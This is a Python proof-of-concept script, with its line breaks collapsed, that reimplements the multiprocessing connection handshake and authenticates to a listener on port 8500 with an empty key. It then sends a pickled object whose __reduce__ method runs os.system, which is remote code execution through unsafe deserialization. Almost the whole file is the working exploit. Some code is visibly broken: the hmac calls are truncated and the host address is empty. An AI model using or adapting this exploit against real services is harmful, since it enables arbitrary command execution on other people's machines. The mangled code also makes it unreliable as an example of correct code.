import os import io import pickle import socket import struct MESSAGE_LENGTH = 20 CHALLENGE = b'#CHALLENGE#' WELCOME = b'#WELCOME#' FAILURE = b'#FAILURE#' def deliver_challenge(io, authkey): import hmac if not isinstance(authkey, bytes): raise ValueError( "Authkey must be bytes, not {0!s}".format(type(authkey))) message = os.urandom(MESSAGE_LENGTH) send_bytes(io, CHALLENGE + message) digest =, message, 'md5').digest() response = recv_bytes(io, 256) # reject large message if response == digest: send_bytes(io, WELCOME) else: send_bytes(io, FAILURE) # raise AuthenticationError('digest received was wrong') def answer_challenge(io, authkey): import hmac if not isinstance(authkey, bytes): raise ValueError( "Authkey must be bytes, not {0!s}".format(type(authkey))) message = recv_bytes(io, 256) # reject large message assert message[:len(CHALLENGE)] == CHALLENGE, 'message = %r' % message message = message[len(CHALLENGE):] print(message) digest =, message, 'md5').digest() print(digest) send_bytes(io, digest) response = recv_bytes(io, 256) # reject large message if response != WELCOME: # raise AuthenticationError('digest sent was rejected') pass def send_bytes(io, buf): n = len(buf) if n > 0x7fffffff: pre_header = struct.pack("!i", -1) header = struct.pack("!Q", n) io.send(pre_header) io.send(header) io.send(buf) else: # For wire compatibility with 3.7 and lower header = struct.pack("!i", n) if n > 16384: # The payload is large so Nagle's algorithm won't be triggered # and we'd better avoid the cost of concatenation. io.send(header) io.send(buf) else: # Issue #20540: concatenate before sending, to avoid delays due # to Nagle's algorithm on a TCP socket. # Also note we want to avoid sending a 0-length buffer separately, # to avoid "broken pipe" errors if the other end closed the pipe. io.send(header + buf) def recv_bytes(io, maxsize=None): buf = io.recv(4) size, = struct.unpack("!i", buf) if size == -1: buf = io.recv(8) size, = struct.unpack("!Q", buf) if maxsize is not None and size > maxsize: return None return io.recv(size) # answer_challenge(c, authkey) # deliver_challenge(c, authkey) class POC(): def __reduce__(self): print(1) return (os.system,('dir',)) ip_port = ('', 8500) io = socket.socket() io.connect(ip_port) answer_challenge(io, b'') deliver_challenge(io, b'') poc = POC() send_bytes(io, pickle.dumps(poc))